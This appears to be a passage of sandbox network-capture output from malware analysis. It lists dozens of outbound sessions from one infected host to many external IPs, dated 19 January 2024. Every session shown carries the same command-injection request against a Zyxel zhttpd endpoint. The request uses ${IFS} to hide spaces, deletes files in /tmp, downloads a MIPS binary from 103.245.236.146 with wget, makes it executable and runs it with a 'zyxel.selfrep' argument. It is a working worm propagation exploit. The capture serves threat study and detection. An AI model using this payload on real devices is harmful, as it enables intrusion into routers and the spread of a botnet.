                                                  Jan 19, 2024 18:24:05.246256113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6827192.168.2.1345888205.40.25.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246277094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6828192.168.2.135860662.48.172.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246335983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6829192.168.2.1351778146.91.129.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246371031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6830192.168.2.133913241.110.44.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246414900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6831192.168.2.1342178150.113.139.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246474981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6832192.168.2.1340030178.96.215.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246501923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6833192.168.2.135697894.81.213.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246556044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6834192.168.2.1344848112.36.226.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246613026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6835192.168.2.1351810221.53.225.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246646881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6836192.168.2.134105638.81.103.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246685982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6837192.168.2.1334710134.145.237.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246726990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6838192.168.2.135088069.117.159.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246759892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6839192.168.2.135302866.156.141.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246787071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6840192.168.2.135019296.156.214.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246840954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6841192.168.2.13396408.143.131.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246901989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6842192.168.2.1338728136.231.126.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246939898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6843192.168.2.1339258188.193.45.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246974945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6844192.168.2.134102640.12.157.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247001886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6845192.168.2.135631295.236.39.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247054100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6846192.168.2.1333920116.92.252.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247091055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6847192.168.2.134507468.61.61.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247124910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6848192.168.2.135252663.122.237.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247165918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6849192.168.2.1359484184.241.156.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247220039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6850192.168.2.1347562174.183.27.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247245073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6851192.168.2.1345308132.92.203.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247297049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6852192.168.2.1337430169.241.71.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247337103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6853192.168.2.1333194120.224.17.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247365952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6854192.168.2.134039651.248.170.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247392893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6855192.168.2.134892873.131.208.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247437000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6856192.168.2.13522729.7.166.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247469902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6857192.168.2.1351706219.86.186.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247522116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6858192.168.2.133648850.193.230.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247554064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6859192.168.2.1336106162.139.195.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247586012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6860192.168.2.1353686117.120.188.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247608900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6861192.168.2.1353628160.18.132.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247674942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6862192.168.2.135742042.42.125.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247697115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6863192.168.2.1360770172.92.77.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247756958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6864192.168.2.1354880101.38.172.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247783899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6865192.168.2.135302091.145.127.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247816086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6866192.168.2.1342292184.244.179.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247843981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6867192.168.2.1355762179.62.218.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247868061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6868192.168.2.1358318168.67.88.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247904062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6869192.168.2.133521458.152.151.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247957945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6870192.168.2.135503042.55.106.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.247981071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6871192.168.2.1339212154.56.205.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.248029947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6872192.168.2.13445689.183.44.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.248050928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6873192.168.2.135281219.119.238.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.248086929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6874192.168.2.134568493.244.70.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.248123884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6875192.168.2.133951420.226.222.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.248164892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6876192.168.2.1335022121.32.53.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.248197079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6877192.168.2.1359242173.7.193.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260041952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6878192.168.2.1355954222.23.230.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260070086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6879192.168.2.1336120199.52.99.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260116100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6880192.168.2.135651485.77.71.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260160923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6881192.168.2.1334642194.79.150.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260191917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6882192.168.2.134497220.135.63.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260247946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6883192.168.2.1337520177.228.202.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260294914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6884192.168.2.135682045.69.121.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260343075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6885192.168.2.134926232.243.1.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260356903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6886192.168.2.133818254.96.56.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260411978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6887192.168.2.1352334135.34.253.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260446072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6888192.168.2.1353632148.143.82.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.260493994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6889192.168.2.1348262131.126.212.53443
                                                  TimestampBytes transferredDirectionData
